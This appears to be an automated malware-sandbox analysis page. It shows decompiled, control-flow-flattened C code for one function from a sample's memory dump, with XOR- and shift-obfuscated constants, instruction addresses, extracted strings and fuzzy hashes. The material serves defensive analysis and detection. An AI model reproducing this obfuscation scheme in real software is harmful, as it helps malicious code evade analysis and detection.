Function 00BC1C12, Relevance: 20.6, Strings: 16, Instructions: 644
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00BC1C12(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				char _v2624;
				intOrPtr _v2628;
				char _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				unsigned int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t755;
				void* _t756;
				short* _t766;
				signed int _t773;
				signed int _t779;
				signed int _t788;
				void* _t791;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				void* _t812;
				signed int _t877;
				void* _t882;
				signed int* _t883;
				signed int* _t884;
				void* _t887;

				_t883 =  &_v2932;
				_v2608 = _v2608 & 0x00000000;
				_v2612 = 0xa3d4eb;
				_v2660 = 0x6758cb;
				_v2660 = _v2660 << 4;
				_v2660 = _v2660 ^ 0x06758c99;
				_v2732 = 0xdc8525;
				_v2732 = _v2732 | 0x3ff23f5d;
				_v2732 = _v2732 ^ 0x3feebf7d;
				_v2928 = 0xfbcda8;
				_v2928 = _v2928 | 0x9eb5e9b7;
				_v2928 = _v2928 + 0xffff6f36;
				_v2928 = _v2928 + 0xffffec33;
				_v2928 = _v2928 ^ 0x9ef08d4a;
				_v2756 = 0xde70d9;
				_t882 = __ecx;
				_t877 = 0x99d8a48;
				_t793 = 0x28;
				_v2756 = _v2756 / _t793;
				_v2756 = _v2756 | 0x7728469f;
				_v2756 = _v2756 ^ 0x772920e1;
				_v2900 = 0xe4279b;
				_v2900 = _v2900 >> 0xc;
				_v2900 = _v2900 * 0x68;
				_v2900 = _v2900 + 0xffff73cc;
				_v2900 = _v2900 ^ 0x000006fc;
				_v2688 = 0xa4ffcb;
				_v2688 = _v2688 + 0xffff5cd6;
				_v2688 = _v2688 ^ 0x00a04a41;
				_v2908 = 0xc9c6ce;
				_v2908 = _v2908 | 0xf5fbf83a;
				_v2908 = _v2908 + 0x7e10;
				_v2908 = _v2908 / _t793;
				_v2908 = _v2908 ^ 0x062c0b4a;
				_v2916 = 0x7f9442;
				_v2916 = _v2916 << 0xb;
				_v2916 = _v2916 ^ 0x8520fee0;
				_v2916 = _v2916 + 0xe609;
				_v2916 = _v2916 ^ 0x798f337b;
				_v2652 = 0x9f68d1;
				_t794 = 0x4e;
				_v2652 = _v2652 * 0x2e;
				_v2652 = _v2652 ^ 0x1cad1c96;
				_v2680 = 0x874387;
				_v2680 = _v2680 / _t794;
				_v2680 = _v2680 ^ 0x000eef56;
				_v2740 = 0x218d86;
				_v2740 = _v2740 ^ 0x8da9a7ec;
				_v2740 = _v2740 + 0xffff8c18;
				_v2740 = _v2740 ^ 0x8d8801a5;
				_v2780 = 0xd8f554;
				_v2780 = _v2780 >> 0xb;
				_v2780 = _v2780 >> 7;
				_v2780 = _v2780 ^ 0x00079072;
				_v2892 = 0x1ce380;
				_v2892 = _v2892 ^ 0x506392b2;
				_v2892 = _v2892 >> 2;
				_v2892 = _v2892 ^ 0xa7f562ec;
				_v2892 = _v2892 ^ 0xb3eeada2;
				_v2748 = 0x4b6045;
				_v2748 = _v2748 | 0xfff2b3bd;
				_v2748 = _v2748 ^ 0xfffe78ab;
				_v2772 = 0x44b019;
				_v2772 = _v2772 << 6;
				_v2772 = _v2772 ^ 0xdf8519b0;
				_v2772 = _v2772 ^ 0xcea55934;
				_v2672 = 0x9de851;
				_v2672 = _v2672 + 0xdaae;
				_v2672 = _v2672 ^ 0x009a5a0c;
				_v2816 = 0xce234;
				_v2816 = _v2816 ^ 0xef3b6bc0;
				_v2816 = _v2816 + 0xb943;
				_v2816 = _v2816 ^ 0xef313dc6;
				_v2644 = 0x831e64;
				_v2644 = _v2644 << 7;
				_v2644 = _v2644 ^ 0x418cd6ce;
				_v2792 = 0xb71d5;
				_v2792 = _v2792 + 0xd0e6;
				_v2792 = _v2792 >> 1;
				_v2792 = _v2792 ^ 0x000ab854;
				_v2800 = 0xbc4add;
				_v2800 = _v2800 >> 4;
				_v2800 = _v2800 >> 4;
				_v2800 = _v2800 ^ 0x000f3ccc;
				_v2860 = 0xc7de55;
				_v2860 = _v2860 >> 8;
				_v2860 = _v2860 >> 3;
				_v2860 = _v2860 + 0xffffb96d;
				_v2860 = _v2860 ^ 0xfff9a10f;
				_v2868 = 0x50e0;
				_v2868 = _v2868 << 0x10;
				_v2868 = _v2868 ^ 0x31c9bada;
				_v2868 = _v2868 << 3;
				_v2868 = _v2868 ^ 0x0945daeb;
				_v2876 = 0x5f8cf7;
				_v2876 = _v2876 ^ 0xc877f21d;
				_v2876 = _v2876 + 0x5049;
				_v2876 = _v2876 ^ 0xb9ce624b;
				_v2876 = _v2876 ^ 0x71e38bc3;
				_v2884 = 0xd45199;
				_v2884 = _v2884 + 0x1b0f;
				_v2884 = _v2884 ^ 0x78878a0d;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 ^ 0x0002122d;
				_v2784 = 0xb41ca7;
				_v2784 = _v2784 >> 6;
				_v2784 = _v2784 << 5;
				_v2784 = _v2784 ^ 0x005b868a;
				_v2636 = 0x8dae72;
				_v2636 = _v2636 + 0xffffc621;
				_v2636 = _v2636 ^ 0x008635a7;
				_v2664 = 0x1c5bb7;
				_v2664 = _v2664 + 0x2d8a;
				_v2664 = _v2664 ^ 0x0011f5d8;
				_v2760 = 0x485545;
				_t204 =  &_v2760; // 0x485545
				_t795 = 0x2b;
				_v2760 =  *_t204 / _t795;
				_t210 =  &_v2760; // 0x772920e1
				_t796 = 0x33;
				_v2760 =  *_t210 / _t796;
				_v2760 = _v2760 ^ 0x0005bb0a;
				_v2768 = 0x206724;
				_v2768 = _v2768 + 0xbd1f;
				_t797 = 0x66;
				_v2768 = _v2768 * 0x7b;
				_v2768 = _v2768 ^ 0x0fe22bc5;
				_v2776 = 0x718f5a;
				_v2776 = _v2776 * 0x3f;
				_v2776 = _v2776 ^ 0xe004a3c2;
				_v2776 = _v2776 ^ 0xfbf0dedb;
				_v2852 = 0x30668;
				_v2852 = _v2852 / _t797;
				_v2852 = _v2852 * 0x79;
				_t798 = 0x34;
				_v2852 = _v2852 * 0x41;
				_v2852 = _v2852 ^ 0x00e90d43;
				_v2880 = 0xddde8d;
				_v2880 = _v2880 + 0xffff9e4d;
				_v2880 = _v2880 ^ 0x2170423a;
				_v2880 = _v2880 >> 1;
				_v2880 = _v2880 ^ 0x10d47b31;
				_v2764 = 0x8f88ee;
				_v2764 = _v2764 + 0xffff0386;
				_v2764 = _v2764 * 0x4a;
				_v2764 = _v2764 ^ 0x293e38ba;
				_v2932 = 0x1330a6;
				_v2932 = _v2932 << 0x10;
				_v2932 = _v2932 ^ 0x26950d85;
				_v2932 = _v2932 | 0xf53ba417;
				_v2932 = _v2932 ^ 0xf73491db;
				_v2848 = 0x8b68d8;
				_v2848 = _v2848 + 0xffffc5d2;
				_v2848 = _v2848 / _t798;
				_t799 = 0x44;
				_v2848 = _v2848 * 0x12;
				_v2848 = _v2848 ^ 0x00302441;
				_v2796 = 0x487ac0;
				_v2796 = _v2796 >> 2;
				_v2796 = _v2796 << 2;
				_v2796 = _v2796 ^ 0x0044512a;
				_v2788 = 0x814d4e;
				_v2788 = _v2788 << 0xd;
				_v2788 = _v2788 + 0xffffeb04;
				_v2788 = _v2788 ^ 0x29afe2cb;
				_v2648 = 0x81f400;
				_v2648 = _v2648 / _t799;
				_v2648 = _v2648 ^ 0x0007d40f;
				_v2924 = 0x344f86;
				_v2924 = _v2924 * 0x6e;
				_v2924 = _v2924 | 0xa7e46eb9;
				_v2924 = _v2924 << 7;
				_v2924 = _v2924 ^ 0xff3431be;
				_v2696 = 0x5309a4;
				_v2696 = _v2696 + 0xabda;
				_v2696 = _v2696 ^ 0x0057eeeb;
				_v2640 = 0xcd8354;
				_v2640 = _v2640 * 0x30;
				_v2640 = _v2640 ^ 0x268d1ae3;
				_v2736 = 0x8b4c85;
				_v2736 = _v2736 + 0xffffcdbf;
				_v2736 = _v2736 >> 9;
				_v2736 = _v2736 ^ 0x00036e60;
				_v2700 = 0x49adfc;
				_v2700 = _v2700 | 0xa8ad8379;
				_v2700 = _v2700 ^ 0xa8e07f1f;
				_v2836 = 0x26ed3a;
				_v2836 = _v2836 << 4;
				_v2836 = _v2836 ^ 0xdd500379;
				_v2836 = _v2836 ^ 0x075ca1f5;
				_v2836 = _v2836 ^ 0xd8654197;
				_v2864 = 0x88b41;
				_v2864 = _v2864 ^ 0x8a41e3e3;
				_v2864 = _v2864 << 2;
				_v2864 = _v2864 * 0x3d;
				_v2864 = _v2864 ^ 0xcdf16822;
				_v2712 = 0x130ad6;
				_v2712 = _v2712 + 0x26b0;
				_v2712 = _v2712 ^ 0x001463fa;
				_v2912 = 0xf18913;
				_t800 = 0x60;
				_v2912 = _v2912 / _t800;
				_v2912 = _v2912 ^ 0xfb8d6542;
				_v2912 = _v2912 ^ 0x1ef95146;
				_v2912 = _v2912 ^ 0xe575fcb3;
				_v2832 = 0xd4991f;
				_v2832 = _v2832 >> 1;
				_t801 = 0x19;
				_v2832 = _v2832 * 0x39;
				_v2832 = _v2832 + 0x6431;
				_v2832 = _v2832 ^ 0x17a3d9f5;
				_v2840 = 0x943911;
				_v2840 = _v2840 ^ 0xe2670b6e;
				_v2840 = _v2840 + 0x24d4;
				_v2840 = _v2840 << 0xd;
				_v2840 = _v2840 ^ 0x6aeb880a;
				_v2904 = 0xa538e8;
				_v2904 = _v2904 >> 0xc;
				_v2904 = _v2904 ^ 0x62edf37a;
				_v2904 = _v2904 + 0xa832;
				_v2904 = _v2904 ^ 0x62e4cbfc;
				_v2888 = 0x16e2bd;
				_v2888 = _v2888 + 0xffff7f28;
				_v2888 = _v2888 * 0x64;
				_v2888 = _v2888 >> 7;
				_v2888 = _v2888 ^ 0x0018f901;
				_v2656 = 0x3f6e99;
				_v2656 = _v2656 >> 0xb;
				_v2656 = _v2656 ^ 0x0009fe52;
				_v2804 = 0xfa19bd;
				_v2804 = _v2804 / _t801;
				_v2804 = _v2804 << 0xa;
				_v2804 = _v2804 ^ 0x28048f08;
				_v2856 = 0x7adc8b;
				_t802 = 3;
				_v2856 = _v2856 / _t802;
				_v2856 = _v2856 << 0xe;
				_v2856 = _v2856 << 9;
				_v2856 = _v2856 ^ 0x17040ca6;
				_v2896 = 0x5caea7;
				_t803 = 0x48;
				_v2896 = _v2896 / _t803;
				_v2896 = _v2896 + 0xffff6657;
				_v2896 = _v2896 + 0xa67d;
				_v2896 = _v2896 ^ 0x000329ba;
				_v2812 = 0x1fcfbe;
				_v2812 = _v2812 >> 6;
				_t804 = 0x38;
				_v2812 = _v2812 / _t804;
				_v2812 = _v2812 ^ 0x0007b63c;
				_v2720 = 0xe95658;
				_v2720 = _v2720 >> 7;
				_v2720 = _v2720 ^ 0x00071478;
				_v2808 = 0x91ff61;
				_v2808 = _v2808 << 7;
				_v2808 = _v2808 | 0xd2954662;
				_v2808 = _v2808 ^ 0xdaf4ea8a;
				_v2824 = 0x446ad6;
				_v2824 = _v2824 ^ 0x83a91402;
				_t805 = 0x4c;
				_v2824 = _v2824 * 0x45;
				_v2824 = _v2824 >> 0x10;
				_v2824 = _v2824 ^ 0x000353dc;
				_v2708 = 0x4b7422;
				_v2708 = _v2708 >> 3;
				_v2708 = _v2708 ^ 0x0008e5f0;
				_v2844 = 0xac34a;
				_v2844 = _v2844 * 0xd;
				_v2844 = _v2844 * 0x1a;
				_v2844 = _v2844 >> 0x10;
				_v2844 = _v2844 ^ 0x0002a3d0;
				_v2716 = 0x7960bf;
				_v2716 = _v2716 + 0xffffc462;
				_v2716 = _v2716 ^ 0x007665d3;
				_v2744 = 0xbebd75;
				_v2744 = _v2744 ^ 0x7a1f8fc9;
				_v2744 = _v2744 / _t805;
				_v2744 = _v2744 ^ 0x0198bdde;
				_v2752 = 0x962c9a;
				_v2752 = _v2752 + 0xfffffa67;
				_t806 = 0x2e;
				_v2752 = _v2752 / _t806;
				_v2752 = _v2752 ^ 0x00030d52;
				_v2920 = 0x9dfed8;
				_v2920 = _v2920 ^ 0x0302cebd;
				_v2920 = _v2920 + 0x73d2;
				_v2920 = _v2920 >> 0xf;
				_v2920 = _v2920 ^ 0x000ba8ee;
				_v2872 = 0x884e2b;
				_v2872 = _v2872 | 0x5783eec3;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 + 0x1dcf;
				_v2872 = _v2872 ^ 0xc5fa8f40;
				_v2668 = 0x393d56;
				_v2668 = _v2668 >> 6;
				_v2668 = _v2668 ^ 0x0000ab92;
				_v2704 = 0x58f1e9;
				_t807 = 0x7c;
				_v2704 = _v2704 / _t807;
				_v2704 = _v2704 ^ 0x00048cf6;
				_v2820 = 0x3ec6d0;
				_v2820 = _v2820 + 0x5fc5;
				_t808 = 0x21;
				_v2820 = _v2820 / _t808;
				_v2820 = _v2820 ^ 0xd86d8e19;
				_v2820 = _v2820 ^ 0xd8634d78;
				_v2828 = 0xe4a70b;
				_v2828 = _v2828 ^ 0x2abc0881;
				_v2828 = _v2828 ^ 0xa79f6464;
				_v2828 = _v2828 >> 0xf;
				_v2828 = _v2828 ^ 0x000c3a60;
				_v2684 = 0x315a2d;
				_v2684 = _v2684 | 0xacf80d9c;
				_v2684 = _v2684 ^ 0xacfa1597;
				_v2692 = 0x63e424;
				_v2692 = _v2692 + 0x44ad;
				_v2692 = _v2692 ^ 0x0068b9d0;
				_v2724 = 0xdbaa4f;
				_v2724 = _v2724 + 0xffffd825;
				_v2724 = _v2724 ^ 0x00d800e8;
				_v2728 = 0xc5e7f7;
				_v2728 = _v2728 << 0xf;
				_v2728 = _v2728 << 0xd;
				_v2728 = _v2728 ^ 0x7003c940;
				_v2676 = 0x7098dc;
				_v2676 = _v2676 ^ 0x810ef473;
				_v2676 = _v2676 ^ 0x817bc99c;
				_t755 = E00BBADFC();
				_t876 = _v2724;
				_t791 = _t755;
				while(1) {
					L1:
					_t756 = 0x32a72b9;
					do {
						while(1) {
							L2:
							_t887 = _t877 - 0x99d8a48;
							if(_t887 > 0) {
								break;
							}
							if(_t887 == 0) {
								_push(_t809);
								_t809 = _v2756;
								E00BBE259(_t809, _v2660, _v2900, _v2688, _t809, _t809,  &_v1564, _v2908, _v2916);
								_t883 =  &(_t883[8]);
								_t877 = 0xe471d7b;
								while(1) {
									L1:
									_t756 = 0x32a72b9;
									goto L2;
								}
							} else {
								if(_t877 == 0xe4882e) {
									_v2620 = E00BB3789();
									_t779 = E00BBF14F(_v2932, _t778, _v2848, _v2796);
									_pop(_t812);
									_v2616 = 2 + _t779 * 2;
									_t809 = _v2788;
									_t773 = E00BC8727(_t809,  &_v2624, _v2648, _t791, _v2924, _v2732, _v2696, _t791, _t812, _t791, _v2640);
									_t883 =  &(_t883[0xa]);
									__eflags = _t773;
									if(__eflags != 0) {
										_t877 = 0xc8e8e82;
										while(1) {
											L1:
											_t756 = 0x32a72b9;
											goto L2;
										}
									}
								} else {
									if(_t877 == _t756) {
										_push(0xbb12a0);
										E00BB8C65(_v2888, __eflags,  &_v2604,  &_v1564, _v2656, _t876, _v2804, E00BD0AD3(_v2840, _v2904, __eflags), _v2856,  &_v524, _v2896, _v2812);
										_t809 = _v2720;
										E00BC2EED(_t809, _v2808, _v2824, _t782);
										_t883 =  &(_t883[0xc]);
										_t877 = 0xca1945b;
										while(1) {
											L1:
											_t756 = 0x32a72b9;
											goto L2;
										}
									} else {
										if(_t877 == 0x3352d63) {
											_t809 = _v2864;
											_t788 = E00BB7739(_t809, _v2712, _v2632, _v2912, _v2628, _v2832);
											_t876 = _t788;
											_t883 =  &(_t883[4]);
											__eflags = _t788;
											_t756 = 0x32a72b9;
											_t877 =  !=  ? 0x32a72b9 : 0xc5894d6;
											continue;
										} else {
											if(_t877 == 0x5779399) {
												return E00BC9038(_v2724, _v2728, _v2624, _v2676);
											}
											if(_t877 != 0x58d7aaf) {
												goto L24;
											} else {
												_t809 = _v2920;
												E00BBF699(_t809, _t876, _v2872, _v2668, _v2704);
												_t883 =  &(_t883[3]);
												_t877 = 0xc5894d6;
												while(1) {
													L1:
													_t756 = 0x32a72b9;
													goto L2;
												}
											}
										}
									}
									L28:
								}
							}
							L27:
							return _t773;
							goto L28;
						}
						__eflags = _t877 - 0xc5894d6;
						if(_t877 == 0xc5894d6) {
							_t809 = _v2820;
							E00BBF699(_t809, _v2632, _v2828, _v2684, _v2692);
							_t883 =  &(_t883[3]);
							_t877 = 0x5779399;
							_t756 = 0x32a72b9;
							goto L24;
						} else {
							__eflags = _t877 - 0xc8e8e82;
							if(_t877 == 0xc8e8e82) {
								_t809 = _v2736;
								E00BC7EDD( &_v2624, _v2700,  &_v2632, _v2836);
								_t883 =  &(_t883[3]);
								asm("sbb esi, esi");
								_t877 = (_t877 & 0xfdbd99ca) + 0x5779399;
								goto L1;
							} else {
								__eflags = _t877 - 0xca1945b;
								if(__eflags == 0) {
									_push(_v2752);
									_push( &_v524);
									_push(0);
									_push(_v2744);
									_push(_v2716);
									_push(_v2844);
									_push(1);
									_push(0);
									E00BD06EF(_v2708, __eflags);
									_t883 =  &(_t883[8]);
									_t877 = 0x58d7aaf;
									while(1) {
										L1:
										_t756 = 0x32a72b9;
										goto L2;
									}
								} else {
									__eflags = _t877 - 0xe471d7b;
									if(__eflags != 0) {
										goto L24;
									} else {
										E00BB24AA(_t809, _v2652, __eflags,  &_v2084, _v2680, _v2740, _v2780);
										_t766 = E00BC0F17(_v2892, _v2748,  &_v2084, _v2772, _v2672);
										_t884 =  &(_t883[7]);
										 *_t766 = 0;
										E00BCCC3F(_v2816,  &_v1044, __eflags, _v2644);
										 *_t884 = 0xbb11b0;
										E00BD06A6(__eflags,  &_v2084, _v2860, E00BD0AD3(_v2792, _v2800, __eflags), _v2868, _v2876,  &_v2604, _v2884);
										E00BC2EED(_v2784, _v2636, _v2664, _t768);
										_t809 =  &_v2604;
										_t773 = E00BD3306(_t809, _v2760, _v2768, _v2776, _t882, _v2852);
										_t883 =  &(_t884[0xd]);
										__eflags = _t773;
										if(__eflags != 0) {
											_t877 = 0xe4882e;
											while(1) {
												L1:
												_t756 = 0x32a72b9;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t877 - 0x51bfa3f;
					} while (__eflags != 0);
					return _t756;
				}
			}

0x00bc1c12
0x00bc1c18
0x00bc1c22
0x00bc1c2d
0x00bc1c38
0x00bc1c40
0x00bc1c4b
0x00bc1c56
0x00bc1c61
0x00bc1c6c
0x00bc1c74
0x00bc1c7c
0x00bc1c84
0x00bc1c8c
0x00bc1c94
0x00bc1cac
0x00bc1cae
0x00bc1cb3
0x00bc1cb8
0x00bc1cbf
0x00bc1cca
0x00bc1cd5
0x00bc1cdd
0x00bc1ce9
0x00bc1ced
0x00bc1cf5
0x00bc1cfd
0x00bc1d08
0x00bc1d13
0x00bc1d1e
0x00bc1d26
0x00bc1d2e
0x00bc1d3e
0x00bc1d42
0x00bc1d4a
0x00bc1d52
0x00bc1d57
0x00bc1d5f
0x00bc1d67
0x00bc1d6f
0x00bc1d82
0x00bc1d83
0x00bc1d8a
0x00bc1d95
0x00bc1da9
0x00bc1db0
0x00bc1dbb
0x00bc1dc6
0x00bc1dd1
0x00bc1ddc
0x00bc1de7
0x00bc1df2
0x00bc1dfa
0x00bc1e02
0x00bc1e0d
0x00bc1e15
0x00bc1e1d
0x00bc1e22
0x00bc1e2a
0x00bc1e32
0x00bc1e3d
0x00bc1e48
0x00bc1e53
0x00bc1e5e
0x00bc1e66
0x00bc1e71
0x00bc1e7e
0x00bc1e89
0x00bc1e94
0x00bc1e9f
0x00bc1eaa
0x00bc1eb5
0x00bc1ec0
0x00bc1ecb
0x00bc1ed6
0x00bc1ede
0x00bc1ee9
0x00bc1ef4
0x00bc1eff
0x00bc1f06
0x00bc1f11
0x00bc1f1c
0x00bc1f24
0x00bc1f2c
0x00bc1f37
0x00bc1f3f
0x00bc1f44
0x00bc1f49
0x00bc1f51
0x00bc1f59
0x00bc1f61
0x00bc1f66
0x00bc1f6e
0x00bc1f73
0x00bc1f7b
0x00bc1f83
0x00bc1f8b
0x00bc1f93
0x00bc1f9b
0x00bc1fa3
0x00bc1fab
0x00bc1fb3
0x00bc1fbb
0x00bc1fc0
0x00bc1fc8
0x00bc1fd3
0x00bc1fdb
0x00bc1fe3
0x00bc1fee
0x00bc1ff9
0x00bc2004
0x00bc200f
0x00bc201a
0x00bc2025
0x00bc2030
0x00bc203b
0x00bc2044
0x00bc2049
0x00bc2052
0x00bc2059
0x00bc205e
0x00bc2067
0x00bc2072
0x00bc207d
0x00bc2090
0x00bc2091
0x00bc2098
0x00bc20a3
0x00bc20b6
0x00bc20bd
0x00bc20c8
0x00bc20d3
0x00bc20e1
0x00bc20ea
0x00bc20f7
0x00bc20fa
0x00bc20fe
0x00bc2106
0x00bc210e
0x00bc2116
0x00bc211e
0x00bc2122
0x00bc212a
0x00bc2135
0x00bc2148
0x00bc214f
0x00bc215a
0x00bc2162
0x00bc2167
0x00bc216f
0x00bc2177
0x00bc217f
0x00bc2187
0x00bc2197
0x00bc21a0
0x00bc21a1
0x00bc21a5
0x00bc21ad
0x00bc21b8
0x00bc21c0
0x00bc21c8
0x00bc21d3
0x00bc21de
0x00bc21e6
0x00bc21f1
0x00bc21fc
0x00bc2210
0x00bc2217
0x00bc2222
0x00bc222f
0x00bc2233
0x00bc223b
0x00bc2240
0x00bc2248
0x00bc2253
0x00bc225e
0x00bc2269
0x00bc227c
0x00bc2283
0x00bc228e
0x00bc2299
0x00bc22a4
0x00bc22ac
0x00bc22b7
0x00bc22c2
0x00bc22cd
0x00bc22d8
0x00bc22e0
0x00bc22e5
0x00bc22ed
0x00bc22f5
0x00bc22fd
0x00bc2305
0x00bc230d
0x00bc2317
0x00bc231b
0x00bc2323
0x00bc232e
0x00bc2339
0x00bc2344
0x00bc2354
0x00bc2359
0x00bc235f
0x00bc2367
0x00bc236f
0x00bc2377
0x00bc237f
0x00bc2388
0x00bc238b
0x00bc238f
0x00bc2397
0x00bc239f
0x00bc23a7
0x00bc23af
0x00bc23b7
0x00bc23bc
0x00bc23c4
0x00bc23cc
0x00bc23d1
0x00bc23d9
0x00bc23e1
0x00bc23e9
0x00bc23f1
0x00bc23fe
0x00bc2402
0x00bc2407
0x00bc240f
0x00bc241a
0x00bc2422
0x00bc242d
0x00bc2443
0x00bc244a
0x00bc2452
0x00bc245d
0x00bc2469
0x00bc246e
0x00bc2474
0x00bc2479
0x00bc247e
0x00bc2486
0x00bc2492
0x00bc2497
0x00bc249d
0x00bc24a5
0x00bc24ad
0x00bc24b5
0x00bc24c0
0x00bc24cf
0x00bc24d2
0x00bc24d9
0x00bc24e4
0x00bc24ef
0x00bc24f7
0x00bc2502
0x00bc250d
0x00bc2515
0x00bc2520
0x00bc252b
0x00bc2533
0x00bc2544
0x00bc2547
0x00bc254e
0x00bc2556
0x00bc2561
0x00bc256c
0x00bc2574
0x00bc257f
0x00bc258c
0x00bc2595
0x00bc2599
0x00bc259e
0x00bc25a6
0x00bc25b1
0x00bc25bc
0x00bc25c7
0x00bc25d2
0x00bc25e8
0x00bc25ef
0x00bc25fa
0x00bc2605
0x00bc2617
0x00bc261c
0x00bc2625
0x00bc2630
0x00bc2638
0x00bc2640
0x00bc2648
0x00bc264d
0x00bc2655
0x00bc265d
0x00bc2665
0x00bc266a
0x00bc2672
0x00bc267a
0x00bc2685
0x00bc268d
0x00bc2698
0x00bc26aa
0x00bc26af
0x00bc26b8
0x00bc26c3
0x00bc26ce
0x00bc26e0
0x00bc26e3
0x00bc26ea
0x00bc26f5
0x00bc2700
0x00bc2708
0x00bc2710
0x00bc2718
0x00bc271d
0x00bc2725
0x00bc2730
0x00bc273b
0x00bc2746
0x00bc2751
0x00bc275c
0x00bc2767
0x00bc2772
0x00bc277d
0x00bc2788
0x00bc2793
0x00bc279b
0x00bc27a3
0x00bc27ae
0x00bc27b9
0x00bc27c4
0x00bc27d3
0x00bc27d8
0x00bc27df
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00bc27e6
0x00bc27e6
0x00bc27e6
0x00bc27e6
0x00bc27ec
0x00000000
0x00000000
0x00bc27f2
0x00bc2999
0x00bc29be
0x00bc29c5
0x00bc29ca
0x00bc29cd
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc27f8
0x00bc27fe
0x00bc2928
0x00bc2937
0x00bc293d
0x00bc2956
0x00bc2977
0x00bc297f
0x00bc2984
0x00bc2987
0x00bc2989
0x00bc298f
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc27e1
0x00bc2804
0x00bc2806
0x00bc289a
0x00bc28e2
0x00bc28f6
0x00bc28fd
0x00bc2902
0x00bc2905
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc280c
0x00bc2812
0x00bc2870
0x00bc2874
0x00bc2879
0x00bc287b
0x00bc287e
0x00bc2885
0x00bc288a
0x00000000
0x00bc2814
0x00bc281a
0x00000000
0x00bc2bfe
0x00bc2826
0x00000000
0x00bc282c
0x00bc2840
0x00bc2844
0x00bc2849
0x00bc284c
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc27e1
0x00bc2826
0x00bc2812
0x00000000
0x00bc2806
0x00bc27fe
0x00bc2c09
0x00bc2c09
0x00000000
0x00bc2c09
0x00bc29d7
0x00bc29dd
0x00bc2bb5
0x00bc2bbc
0x00bc2bc1
0x00bc2bc4
0x00bc2bc9
0x00000000
0x00bc29e3
0x00bc29e3
0x00bc29e9
0x00bc2b6e
0x00bc2b7c
0x00bc2b81
0x00bc2b86
0x00bc2b8e
0x00000000
0x00bc29ef
0x00bc29ef
0x00bc29f5
0x00bc2b1b
0x00bc2b29
0x00bc2b2a
0x00bc2b2c
0x00bc2b33
0x00bc2b3a
0x00bc2b45
0x00bc2b47
0x00bc2b49
0x00bc2b4e
0x00bc2b51
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc29fb
0x00bc29fb
0x00bc2a01
0x00000000
0x00bc2a07
0x00bc2a2b
0x00bc2a51
0x00bc2a56
0x00bc2a62
0x00bc2a73
0x00bc2a86
0x00bc2abd
0x00bc2adb
0x00bc2ae4
0x00bc2b01
0x00bc2b06
0x00bc2b09
0x00bc2b0b
0x00bc2b11
0x00bc27e1
0x00bc27e1
0x00bc27e1
0x00000000
0x00bc27e1
0x00bc27e1
0x00bc2b0b
0x00bc2a01
0x00bc29f5
0x00bc29e9
0x00000000
0x00bc2bce
0x00bc2bce
0x00bc2bce
0x00000000
0x00bc27e6

Strings

V=9, xrefs: 00BC267A
P, xrefs: 00BC1F59
)wEUH, xrefs: 00BC2052
EUH, xrefs: 00BC203B
*QD, xrefs: 00BC21C8
E`K, xrefs: 00BC1E32
-Z1, xrefs: 00BC2725
1d, xrefs: 00BC238F
:&, xrefs: 00BC22D8
A$0, xrefs: 00BC21A5
"tK, xrefs: 00BC2561
W, xrefs: 00BC225E
$g , xrefs: 00BC2072
:Bp!, xrefs: 00BC2116
XV, xrefs: 00BC24E4
$c, xrefs: 00BC2746

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "tK$$g $$c$*QD$-Z1$1d$:Bp!$:&$A$0$EUH$E`K$V=9$XV$ )wEUH$P$W
API String ID: 0-3509732160
Opcode ID: 35ae0263fc1d59f020418216d2276d26605c7386ef7a24a35ee5553571bc8841
Instruction ID: 06308a10b05a76f8c714f4410f3a1e9f32e21d6e7f1ed272a797674e71719249
Opcode Fuzzy Hash: 35ae0263fc1d59f020418216d2276d26605c7386ef7a24a35ee5553571bc8841
Instruction Fuzzy Hash: 4972EF715083809BD378CF25C98AB9BBBE1FBD4308F108A1DE5DA96260D7B19949CF53

Uniqueness

